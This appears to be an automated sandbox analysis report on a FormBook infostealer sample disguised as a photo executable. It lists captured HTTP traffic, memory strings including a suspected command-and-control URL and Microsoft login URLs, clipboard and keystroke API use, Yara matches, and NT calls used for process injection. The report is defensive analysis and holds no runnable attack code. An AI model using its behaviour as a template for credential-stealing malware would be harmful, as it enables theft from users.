href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:21 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:27 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:29 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 11:03:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Source: eODCXMCnMwxOuMbj.exe, 00000008.00000002.4643559111.0000000004B2E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.joyesi.xyz
Source: eODCXMCnMwxOuMbj.exe, 00000008.00000002.4643559111.0000000004B2E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.joyesi.xyz/fo8o/
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://code.jquery.com/jquery-3.7.1.min.js
Source: netbtugc.exe, 00000004.00000002.4642290282.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000003592000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.4642290282.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000003592000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.4634931350.0000000002798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.4634931350.0000000002798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.2500061209.0000000007822000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.4634931350.0000000002798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: netbtugc.exe, 00000004.00000002.4634931350.0000000002798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.4634931350.0000000002798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000004.00000002.4634931350.0000000002798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.4634931350.0000000002798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://rakkoma.com/
Source: netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
Source: netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.4642290282.000000000493A000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000003BDA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.empowermedeco.com/fo8o/?wP=mxnR
Source: netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-MLXKCD66
Source: netbtugc.exe, 00000004.00000002.4644164131.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4642290282.0000000003FCE000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.000000000326E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.000000000326E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.value-domain.com/
Source: eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.value-domain.com/modall.php

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DB425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00DB425A

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DB4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00DB4458

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

0_2_00DB425A

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DA0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00DA0219

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DCCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00DCCDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4641575979.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4643559111.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2316109187.0000000007000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4641284738.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2315423366.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4631777519.0000000002360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4641065257.0000000005F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2315722372.0000000003510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00D43B4C
Source: rPHOTO09AUG2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rPHOTO09AUG2024.exe, 00000000.00000000.2154411590.0000000000DF5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bab62735-f
Source: rPHOTO09AUG2024.exe, 00000000.00000000.2154411590.0000000000DF5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3d1d2bdb-d
Source: rPHOTO09AUG2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_775d1fc8-3
Source: rPHOTO09AUG2024.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bbce6b1b-2

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042B363 NtClose,	2_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B60 NtClose,LdrInitializeThunk,	2_2_03772B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03772DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03772C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,	2_2_037735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774340 NtSetContextThread,	2_2_03774340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03774650 NtSuspendThread,	2_2_03774650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BF0 NtAllocateVirtualMemory,	2_2_03772BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BE0 NtQueryValueKey,	2_2_03772BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772BA0 NtEnumerateValueKey,	2_2_03772BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772B80 NtQueryInformationFile,	2_2_03772B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AF0 NtWriteFile,	2_2_03772AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AD0 NtReadFile,	2_2_03772AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772AB0 NtWaitForSingleObject,	2_2_03772AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F60 NtCreateProcessEx,	2_2_03772F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F30 NtCreateSection,	2_2_03772F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FE0 NtCreateFile,	2_2_03772FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FB0 NtResumeThread,	2_2_03772FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772FA0 NtQuerySection,	2_2_03772FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772F90 NtProtectVirtualMemory,	2_2_03772F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E30 NtWriteVirtualMemory,	2_2_03772E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EE0 NtQueueApcThread,	2_2_03772EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772EA0 NtAdjustPrivilegesToken,	2_2_03772EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772E80 NtReadVirtualMemory,	2_2_03772E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D30 NtUnmapViewOfSection,	2_2_03772D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D10 NtMapViewOfSection,	2_2_03772D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772D00 NtSetInformationFile,	2_2_03772D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DD0 NtDelayExecution,	2_2_03772DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772DB0 NtEnumerateKey,	2_2_03772DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C60 NtCreateKey,	2_2_03772C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772C00 NtQueryInformationProcess,	2_2_03772C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CF0 NtOpenProcess,	2_2_03772CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CC0 NtQueryVirtualMemory,	2_2_03772CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772CA0 NtQueryInformationToken,	2_2_03772CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773010 NtOpenDirectoryObject,	2_2_03773010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773090 NtSetValueKey,	2_2_03773090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037739B0 NtGetContextThread,	2_2_037739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D70 NtOpenThread,	2_2_03773D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03773D10 NtOpenProcessToken,	2_2_03773D10
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E54340 NtSetContextThread,LdrInitializeThunk,	4_2_02E54340
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E54650 NtSuspendThread,LdrInitializeThunk,	4_2_02E54650
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52AF0 NtWriteFile,LdrInitializeThunk,	4_2_02E52AF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52AD0 NtReadFile,LdrInitializeThunk,	4_2_02E52AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_02E52BE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_02E52BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_02E52BA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52B60 NtClose,LdrInitializeThunk,	4_2_02E52B60
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_02E52EE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_02E52E80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52FE0 NtCreateFile,LdrInitializeThunk,	4_2_02E52FE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52FB0 NtResumeThread,LdrInitializeThunk,	4_2_02E52FB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02E52F30 NtCreateSection,LdrInitializeThunk,	4_2_02E52F30
